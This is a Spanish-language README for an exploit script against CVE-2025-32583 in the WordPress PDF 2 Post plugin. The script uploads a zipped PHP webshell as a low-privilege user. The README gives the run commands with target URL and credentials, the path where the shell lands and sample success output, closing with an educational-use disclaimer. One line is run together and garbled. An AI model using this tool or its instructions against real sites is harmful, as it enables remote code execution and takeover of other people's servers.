
El plugin PDF 2 Post de WordPress <= 2.4.0 es vulnerable a Ejecución Remota de Código (RCE) +Subscriber
Vulnerabilidad CRÍTICA
CVE-ID: CVE-2025-32583
Severidad: 9.9 (CRÍTICA)
Vector CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Una vulnerabilidad en el plugin PDF 2 Post de WordPress (desarrollado por termel) permite la Inclusión Remota de Código (RCE) debido a un Control Inadecuado de la Generación de Código.
Versiones afectadas: <= 2.4.0
La falla permite que usuarios autenticados (incluso con bajos privilegios) suban un .zip que contenga código PHP. Una vez extraído por el plugin, el archivo PHP malicioso puede ejecutarse de forma remota a través de un directorio de subidas de acceso público.
Nxploited.zip maliciosononce dinámicoUna vez subido el payload, el shell PHP se extraerá dentro de la carpeta de subidas de WordPress.
🛠️ Ruta por defecto:
/wp-content/uploads/YYYY/MM/nxploited.php
Por ejemplo, si se explota en mayo de 2025, la URL sería:
http://target-site.com/wp-content/uploads/2025/05/nxploited.php
🕓 WordPress organiza automáticamente las subidas por año/mes, así que asegúrate de revisar la carpeta correcta según la fecha actual.
python CVE-2025-32583.py --help
python CVE-2025-32583.py -u http://target-site.com/wordpress -un admin -p admin
Exploit By: Khaled_alenazi (Nxploited)
[+] Payload Nxploited.zip created successfully.
[+] Logged in successfully.
[+] Found nonce: 3c3e8fff7c
[+] Payload uploaded.
CVE-2025-32583.py
Esta herramienta está destinada estrictamente para fines educativos y de pruebas de penetración autorizadas.
Cualquier mal uso de este código para actividades no autorizadas está estrictamente prohibido.
El autor no se hace responsable de ningún daño o uso indebido.
Por: Khaled_alenazi (Nxploited)